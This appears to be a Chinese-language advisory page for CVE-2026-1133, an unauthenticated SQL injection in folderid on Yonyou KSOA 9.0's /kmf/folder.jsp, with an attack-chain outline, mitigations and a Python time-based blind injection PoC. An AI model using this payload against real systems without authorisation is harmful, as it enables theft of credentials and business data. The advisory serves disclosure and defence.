CVE-2026-1133 Yonyou KSOA 9.0 folder.jsp SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-1133

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Yonyou KSOA 9.0

漏洞概述

CVE-2026-1133是影响用友KSOA 9.0版本的安全漏洞，存在于/kmf/folder.jsp组件中。该漏洞允许远程攻击者通过操纵HTTP GET请求中的folderid参数执行SQL注入攻击。由于该漏洞具有无需认证、远程可利用、已公开披露等特点，因此被评定为高危漏洞（CVSS评分7.3）。用友KSOA是用友网络科技股份有限公司开发的企业级应用服务器，广泛应用于企业信息化系统中。一旦该漏洞被利用，攻击者可以获取数据库中的敏感信息，包括但不限于用户凭证、业务数据、公司机密信息等。此外，攻击者还可能通过SQL注入进一步实现数据篡改、远程代码执行等更严重的攻击行为，对企业信息系统造成极大威胁。

技术细节

该SQL注入漏洞位于用友KSOA 9.0的/kmf/folder.jsp文件中，具体问题出在HTTP GET参数处理器对folderid参数的处理上。攻击者可以通过构造恶意的SQL语句片段作为folderid参数值，绕过应用程序的输入验证机制，从而实现未授权的数据库操作。漏洞的利用条件包括：1）攻击者需要能够发送HTTP请求到目标服务器的/kmf/folder.jsp端点；2）目标服务器运行存在漏洞的用友KSOA 9.0版本；3）应用程序未对folderid参数进行充分的输入过滤或使用参数化查询。根据CVSS向量显示，该漏洞具有低攻击复杂度（AC:L），不需要任何权限（PR:N）和用户交互（UI:N），这意味着任何能够访问目标系统的攻击者都可以轻松利用此漏洞。攻击成功后可能导致的危害包括：数据库敏感数据泄露、数据库结构被破坏、潜在的后续权限提升攻击等。

攻击链分析

STEP 1

步骤1

信息收集：攻击者首先识别目标网站使用的用友KSOA版本，确认是否为目标版本9.0

STEP 2

步骤2

漏洞探测：攻击者访问/kmf/folder.jsp端点，通过发送带有folderid参数的正常请求，观察响应特征

STEP 3

步骤3

注入点识别：攻击者构造包含SQL语法片段的folderid参数值，测试是否存在SQL注入漏洞

STEP 4

步骤4

数据提取：利用UNION SELECT、布尔盲注或时间盲注等技术，从数据库中提取敏感信息如用户表、密码哈希等

STEP 5

步骤5

权限提升：获取数据库访问权限后，攻击者可能尝试通过数据库的系统函数实现操作系统层面的命令执行

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target_url = "http://target-server:80/kmf/folder.jsp"

# SQL Injection PoC - Boolean-based blind injection
# Extract database version using time-based blind injection
payload = "1' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END) AND '1'='1"

params = {
    "folderid": payload
}

try:
    print(f"[*] Sending payload to {target_url}")
    print(f"[*] Payload: {payload}")
    
    response = requests.get(target_url, params=params, timeout=10)
    
    print(f"[*] Status Code: {response.status_code}")
    print(f"[*] Response Time: {response.elapsed.total_seconds()}s")
    
    if response.elapsed.total_seconds() >= 5:
        print("[+] SQL Injection confirmed - Time-based blind injection works")
    else:
        print("[-] No obvious time delay detected")
        
except requests.exceptions.Timeout:
    print("[+] SQL Injection confirmed - Request timed out as expected")
except Exception as e:
    print(f"[-] Error: {e}")

影响范围

Yonyou KSOA 9.0

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1）通过Web应用防火墙配置SQL注入防护规则，拦截包含SQL关键字的请求；2）使用Nginx或Apache等反向代理服务器限制对/kmf/folder.jsp路径的访问；3）在应用层代码中对folderid参数进行严格的输入过滤和正则表达式校验；4）暂时禁用/kmf/folder.jsp功能，待官方修复后再恢复使用；5）加强数据库监控，及时发现异常的SQL执行行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-1133
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-1133
3 Details https://www.cvedetails.com/cve/CVE-2026-1133/
4 VulDB https://vuldb.com/cve/CVE-2026-1133
5 Link https://github.com/LX-66-LX/cve/issues/16
6 Link https://vuldb.com/?ctiid.341723
7 Link https://vuldb.com/?id.341723
8 Link https://vuldb.com/?submit.734576